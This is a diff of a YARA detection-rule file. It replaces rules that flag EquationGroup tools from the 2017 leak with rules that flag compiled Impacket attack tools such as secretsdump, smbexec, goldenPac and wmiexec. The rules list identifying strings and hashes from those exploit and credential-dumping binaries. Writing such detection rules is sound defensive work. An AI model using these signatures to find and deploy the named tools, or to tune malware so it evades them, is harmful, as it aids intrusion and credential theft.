-		hash2 = "5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae"
+		hash1 = "19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4"
 
 	strings:
-		$x1 = "DFReader.exe logfile AESKey [-j] [-o outputfilename]" fullword ascii
-		$x2 = "Double Feature Target Version" fullword ascii
-		$x3 = "DoubleFeature Process ID" fullword ascii
-		$op1 = { a1 30 21 41 00 89 85 d8 fc ff ff a1 34 21 41 00 }
+		$s1 = "bwmiexec.exe.manifest" fullword ascii
+		$s2 = "swmiexec" fullword ascii
+		$s3 = "\\yzHPlU=QA" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and 2 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Vtuner_Vtuner_1 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Sniffer : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3794f30b-39dc-59eb-9fd3-4c7837bfd47d"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3295-L3315"
+		id = "07051edc-91a8-59d6-87bf-dba98ef28588"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L49-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8c161b36599b11264c31c54b94d6bdba53b3f13d27861ededc9f03bba394b775"
+		logic_hash = "77f4a7cdfced27ea342fe0fe6debebb720b7494b3f352465ab2fd92f2b7178ab"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431"
-		hash2 = "b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e"
+		hash1 = "efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769"
 
 	strings:
-		$s1 = "Unable to get -w hash.  %x" fullword wide
-		$s2 = "!\"invalid instruction mnemonic constant Id3vil\"" fullword wide
-		$s4 = "Unable to set -w provider. %x" fullword wide
-		$op0 = { 2b c7 50 e8 3a 8c ff ff ff b6 c0 }
-		$op2 = { a1 8c 62 47 00 81 65 e0 ff ff ff 7f 03 d8 8b c1 }
+		$s1 = "ssniffer" fullword ascii
+		$s2 = "impacket.dhcp(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Ecwi_ESKE_EVFR_RPC2_2 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Mmcexec : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c653b0a-fda4-51d6-bf90-bd637547fe47"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3317-L3336"
+		id = "cca2082f-72a4-50c8-80b8-a9bed430dc4e"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L65-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "73522034c6588fee090eff87602568371562bdbcbe781ee6e152f3b854514690"
+		logic_hash = "1aee75155ed3d868f576d7d650f0791ac54e351851f7bfb65390b4ae5c4c83b9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
-		hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
+		hash1 = "263a1655a94b7920531e123a8c9737428f2988bf58156c62408e192d4b2a63fc"
 
 	strings:
-		$s1 = "Target is share name" fullword ascii
-		$s2 = "Could not make UdpNetbios header -- bailing" fullword ascii
-		$s3 = "Request non-NT session key" fullword ascii
+		$s1 = "smmcexec" fullword ascii
+		$s2 = "\\yzHPlU=QA" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 16000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__EAFU_Ecwi_ESKE_EVFR_RPC2_4 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Ifmap : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9dc9ed95-5233-56e1-b8f1-4f27f43e7e43"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3338-L3361"
+		id = "e5461916-ec2b-5f65-b938-267483f50bb2"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L81-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ed6e0e4e5a0849aad64bbc47c047f3fe388052d0ebe89de0257d4422fb39be21"
+		logic_hash = "bbe875e03434c040da914e81ec5ef691ba8fd02607631e118d958819d0e94ff5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6"
-		hash2 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
-		hash3 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash4 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
-		hash5 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
+		hash1 = "20a1f11788e6cc98a76dca2db4691963c054fc12a4d608ac41739b98f84b3613"
 
 	strings:
-		$x1 = "* Listening Post DLL %s() returned error code %d." fullword ascii
-		$s1 = "WsaErrorTooManyProcesses" fullword ascii
-		$s2 = "NtErrorMoreProcessingRequired" fullword ascii
-		$s3 = "Connection closed by remote host (TCP Ack/Fin)" fullword ascii
-		$s4 = "ServerErrorBadNamePassword" fullword ascii
+		$s1 = "bifmap.exe.manifest" fullword ascii
+		$s2 = "impacket.dcerpc.v5.epm(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of ( $s* ) or 1 of ( $x* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Sendcftrigger_Sendpktrigger_6 : FILE
+rule SIGNATURE_BASE_Karmasmb : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "658d6f7d-2164-5e43-b5a5-d9bea9cd2e27"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3363-L3379"
+		id = "32c810c7-02e7-5203-b2ed-4e930b318cc0"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L97-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4fb290bdf15e0701b6d543e1f978011046abe23e58c790ee1b992a5e0443a271"
+		logic_hash = "94322dda799bcb25caeb7f9e526bcc14c6dfd9247080b4bb79dcd7b340fcb36c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3bee31b9edca8aa010a4684c2806b0ca988b2bcc14ad0964fec4f11f3f6fb748"
-		hash2 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
+		hash1 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
 
 	strings:
-		$s4 = "* Failed to connect to destination - %u" fullword wide
-		$s6 = "* Failed to convert destination address into sockaddr_storage values" fullword wide
+		$s1 = "bkarmaSMB.exe.manifest" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Addresource : FILE
+rule SIGNATURE_BASE_Samrdump : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cbba38fa-a906-5463-ae46-2b9c9f1bf8e0"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3381-L3398"
+		id = "cd274719-c8cc-5882-8d75-192ad822c6b3"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L112-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e59863ac7f1147cdbc34cbd2b09183487999d9f01974279c7ccc0c5af7a99976"
+		logic_hash = "6bc0a4d9f9bd0d72e7f2ce4b0f8608296e6f2db14fd3a1740e0eebfe35629018"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "e83e4648875d4c4aa8bc6f3c150c12bad45d066e2116087cdf78a4a4efbab6f0"
-		hash2 = "5a04d65a61ef04f5a1cbc29398c767eada367459dc09c54c3f4e35015c71ccff"
+		hash1 = "4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a"
 
 	strings:
-		$s1 = "%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat" fullword ascii
-		$s2 = "<PE path> - the path to the PE binary to which to add the resource." fullword ascii
-		$s3 = "Unable to get path for target binary." fullword ascii
+		$s2 = "bsamrdump.exe.manifest" fullword ascii
+		$s3 = "ssamrdump" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ESKE_RPC2_8 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Rpcdump : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "694a1afc-7fea-58ac-b736-44957bbc0334"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3400-L3416"
+		id = "3f998aa6-c260-5fef-99ef-e8b4770c68c6"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L128-L142"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1fa706fb7f138d679421fe6c5b29d6bf93893adc8bffe9dffaafa728c1b2d1d5"
+		logic_hash = "cf0a64391ef0a5d3f87996fb3e4f152a3ff4938356b96f840aa3f4f4f30aaa97"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash2 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
+		hash1 = "21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9"
 
 	strings:
-		$s4 = "Fragment: Packet too small to contain RPC header" fullword ascii
-		$s5 = "Fragment pickup: SmbNtReadX failed" fullword ascii
+		$s1 = "srpcdump" fullword ascii
+		$s2 = "impacket.dcerpc.v5.epm(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ETBL_ETRE_10 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Secretsdump : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7dfff868-cb66-51c0-a7c7-5cc872232b86"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3441-L3458"
+		id = "c944d051-ea24-5595-abef-59e326ad56de"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L144-L158"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bc30c62da7a7fd9144efef6f44c50552234f372c38c4479a024fbb0ca72530de"
+		logic_hash = "462748d60764c6fbaeede48b5a98cb68f61cf695f976bf6db94cb497be48fcb2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
-		hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
+		hash1 = "47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d"
 
 	strings:
-		$x1 = "Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword" fullword ascii
-		$x6 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08X" fullword ascii
-		$s19 = "Sending Implant Payload.. cEncImplantPayload size(%d)" fullword ascii
+		$s1 = "ssecretsdump" fullword ascii
+		$s2 = "impacket.ese(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Esentutl : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6848065-377b-5eda-821d-d2cc16f483cc"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3460-L3479"
+		id = "1965e2b3-54be-553a-83d6-a0d4919414dd"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L160-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8d43aa4823de248308597bd02cd27e598808b94e1ad7348ddb9e27d8a37ac426"
+		logic_hash = "e972ad610df65309f4e5996ad0b537670b944f43b810fda5a890ea995193a97a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
-		hash4 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
-		hash5 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash1 = "70d854953d3ebb2c252783a4a103ba0e596d6ab447f238af777fb37d2b64c0cd"
 
 	strings:
-		$x1 = "Target is vulnerable" fullword ascii
-		$x2 = "Target is NOT vulnerable" fullword ascii
+		$s1 = "impacket.ese(" ascii
+		$s2 = "sesentutl" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 11000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_Ridearea2_12 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Opdump : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63c7733c-9942-56f3-95cc-f3e72b693739"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3481-L3498"
+		id = "1bb0e747-e9b7-5a54-8052-428351be8d0d"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L176-L190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0119cd825c02a094ddd76c5cb27bee6cef112f25333eab62017448804b29286e"
+		logic_hash = "18b772e19fd61d77f3a671ee097e0f032738a73a360f4cfe79df4eb6377e12b1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
-		hash4 = "e702223ab42c54fff96f198611d0b2e8a1ceba40586d466ba9aadfa2fd34386e"
+		hash1 = "e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742"
 
 	strings:
-		$x2 = "** CreatePayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+		$s2 = "bopdump.exe.manifest" fullword ascii
+		$s3 = "sopdump" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_13 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Sniff : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8bc3c47c-7357-5692-86aa-e43b40f8c1ab"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3500-L3516"
+		id = "07051edc-91a8-59d6-87bf-dba98ef28588"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L192-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a1859266b859d4da660a7fc7d0015954ff100c39b941b5461ba0c99b5103547"
+		logic_hash = "b317e23d1f76cec4d5b14cb95d463ec410551052b30f1d2d5f52a441104108c0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash1 = "8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699"
 
 	strings:
-		$x1 = "Skip call to PackageRideArea().  Payload has already been packaged. Options -x and -q ignored." fullword ascii
-		$s2 = "ERROR: pGvars->pIntRideAreaImplantPayload is NULL" fullword ascii
+		$s1 = "ssniff" fullword ascii
+		$s2 = "impacket.eap(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Nameprobe_SMBTOUCH_14 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Smbexec : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b3b7037b-d08e-5b32-93ec-870f8ce088ac"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3518-L3535"
+		id = "02208817-2eab-54e2-90cf-44dbf5474607"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L208-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c60fc34aa42810a5622fbe53122ded4ffb4ee321fed1badd481ce5c2ae5225ef"
+		logic_hash = "0f424dd5cc525ef0bd9671c4c1b8da0a1ff9eb79056cc081c1ebe7c9bf75fee6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "fbe3a4501654438f502a93f51b298ff3abf4e4cad34ce4ec0fad5cb5c2071597"
-		hash2 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
+		hash1 = "7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2"
 
 	strings:
-		$s1 = "DEC Pathworks TCPIP service on Windows NT" fullword ascii
-		$s2 = "<\\\\__MSBROWSE__> G" fullword ascii
-		$s3 = "<IRISNAMESERVER>" fullword ascii
+		$s1 = "logging.config(" ascii
+		$s2 = "ssmbexec" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_RPC2_15 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Goldenpac : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f671a10d-f0b8-5343-97b5-e60b7f2f0acf"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3537-L3555"
+		id = "9894d16c-83fa-5e1d-9ca6-572deeec006a"
+		date = "2017-04-07"
+		modified = "2025-03-29"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L224-L239"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6c61d17e1a985deb31bd6e1d603283e77df477b52fce9eb8b6cb4e99b2f9c4dc"
+		logic_hash = "0c764083a699204819f9ff6e2664a50d467447d0fff040ef32a8e28cc678b3cd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
-		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
-		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
-		hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
+		hash1 = "4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3"
 
 	strings:
-		$x1 = "** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
-		$s8 = "Binding to RPC Interface %s over named pipe" fullword ascii
+		$s1 = "impacket.examples.serviceinstall(" ascii
+		$s2 = "bgoldenPac.exe" fullword ascii
+		$s3 = "json.scanner(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_16 : FILE
+rule SIGNATURE_BASE_Impacket_Tools_Netview : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Compiled Impacket Tools"
